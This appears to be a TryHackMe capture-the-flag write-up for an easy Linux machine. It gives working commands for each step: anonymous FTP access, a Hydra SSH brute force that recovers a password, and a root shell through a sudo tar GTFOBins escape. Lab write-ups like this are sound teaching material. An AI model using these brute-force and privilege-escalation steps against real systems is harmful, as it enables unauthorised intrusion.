Platform: TryHackMe
OS: Linux
Difficulty: Easy
Tags: ftp anonymous-login hydra ssh-bruteforce sudo tar linux
Date: 2026-05
Linux machine with anonymous FTP access exposing a username list and a locked-out note. Used Hydra to brute-force SSH with the recovered usernames and rockyou.txt. Logged in as lin, then escalated to root via sudo tar — a classic GTFOBins vector.
nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
ftp <TARGET_IP>
# Username: anonymous
# Password: (blank)
ls-rw-rw-r-- locks.txt
-rw-rw-r-- task.txt
get locks.txt
get task.txttask.txt reveals the author is lin.
locks.txt contains a list of passwords (potential wordlist).
Static page with a Cowboy Bebop theme. Nothing interactive — no hidden directories worth pursuing given the FTP findings.
Used locks.txt as a password list and targeted the username lin:
hydra -l lin -P locks.txt ssh://<TARGET_IP>[22][ssh] host: <TARGET_IP> login: lin password: RedDr4gonSynd1cat3
ssh lin@<TARGET_IP>
cat user.txtsudo -lUser lin may run the following commands on bountyhacker:
(root) /bin/tar
tar with sudo — check GTFOBins:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh# whoami
root
cat /root/root.txt- Always try anonymous FTP — it's enabled by default on many older configs
- Files on FTP can contain usernames, passwords, or useful recon data — always download everything
task.txtrevealing the author's name is a subtle but important cluesudo -lis the first thing to run on a Linux box after getting a shell- GTFOBins covers
tar—--checkpoint-action=execis the key flag